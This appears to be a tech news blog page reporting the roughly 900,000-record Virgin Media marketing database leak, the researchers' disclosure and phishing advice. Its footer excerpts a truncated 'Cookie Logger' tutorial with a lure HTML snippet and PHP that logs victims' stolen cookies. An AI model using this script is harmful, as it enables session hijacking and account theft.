Skip to main content

Virgin Media Data Leak Exposes Details of 900,000 Customers

By
virgin media data breach

On the same day yesterday, when the US-based telecom giant T-Mobile admitted a data breach, the UK-based telecommunication provider Virgin Media announced that it has also suffered a data leak incident exposing the personal information of roughly 900,000 customers.

What happened?


Unlike the T-Mobile data breach that involved a sophisticated cyber attack, Virgin Media said the incident was neither a cyber attack nor the company's database was hacked.

Rather the personal details of around 900,000 Virgin Media UK-based customers were exposed after one of its marketing databases was left unsecured on the Internet and accessible to anyone without requiring any authentication.

"The precise situation is that information stored on one of our databases has been accessed without permission. The incident did not occur due to a hack, but as a result of the database being incorrectly configured," the company said in a note published on its website on Thursday night.
According to the notification, Virgin Media said the exposed database was accidentally left unsecured on the Internet from April 19, 2019—that's almost a year—and was recently accessed by an unauthorized party at least once.

What type of information was accessed?


The exposed database stored the information (listed below) on both customers and potential customers, including "fixed-line customers representing approximately 15% of that customer base," said Virgin Media CEO Lutz Schüler.

  • customer names,
  • home addresses,
  • email addresses,
  • phone numbers,
  • technical and product information, which includes any requests people may have made using forms on the company's website, and
  • dates of birth 'in a very small number of cases.'

"Please note that this is all of the types of information in the database, but not all of this information may have related to every customer," Virgin Media said.

The company assured its customers that the misconfigured marketing database did not include affected customers' account passwords or financial information such as credit cards or bank account numbers.

However, Schüler said the company doesn't know "the extent of the access or if any information was actually used."

Who Discovered the Data Leak?


The unguarded database was first discovered online by researchers at TurgenSec, who then responsibly reported it to the Virgin Media's security team as per the National Cyber Security Centre (NCSC) cybersecurity guidelines.

Though the Virgin Media has surprisingly not publicly acknowledged TurgenSec's findings, the researchers confirmed The Hacker News that the leaked data includes at least 2,324,498 records concerning 900,000 people.

"We cannot speak for the intentions of their communications team but stating to their customers that there was only a breach of "limited contact information" is from our perspective understating the matter potentially to the point of being disingenuous," TurgenSec said in a statement.

According to TurgenSec team, the leaked data also includes affected users':

  • IP addresses,
  • Requests to block or unblock various pornographic, gore and gambling websites, corresponding to full names and addresses,
  • IMEI numbers associated with their stolen phones,
  • Subscriptions to the different aspects of their services, including premium components,
  • Device type owned by the user,
  • The "referrer" header collected from the browsers, exposing which previous site users had visited before accessing Virgin Media.


What is Virgin Media now doing?


The company said the unauthorized access to the database has been shut down immediately following the discovery and that it launched a full independent forensic investigation to determine the extent of the breach incident.

 The company is also contacting affected customers of security failure and has already notified the Information Commissioner's Office.

What affected customers should do now?


Affected customers should be suspicious of phishing emails, which are usually the next step of cybercriminals with such data in hands to trick users into giving away further details like their passwords and banking information.

"We urge people to remain cautious before clicking on an unknown link or giving any details to an unverified or unknown party. Online security advice and help on a range of topics are available on our website," Virgin Media said.

Though the compromised data doesn't include any banking or financial data, it is always a good idea to be vigilant and keep a close eye on your bank and payment card statements and report any unusual activity to your respective bank.

For more information regarding the security incident, Virgin Media customers can visit the company's website or call their customer service line on 0345 454 1111.
Labels:

Comments

Post a Comment

Popular posts from this blog

10 Best Forum Software For Webmasters

By
10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h
Post a Comment
Read more

Assembly Language Step-by-step: Programming with DOS and Linux-

By
(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary
Post a Comment
Read more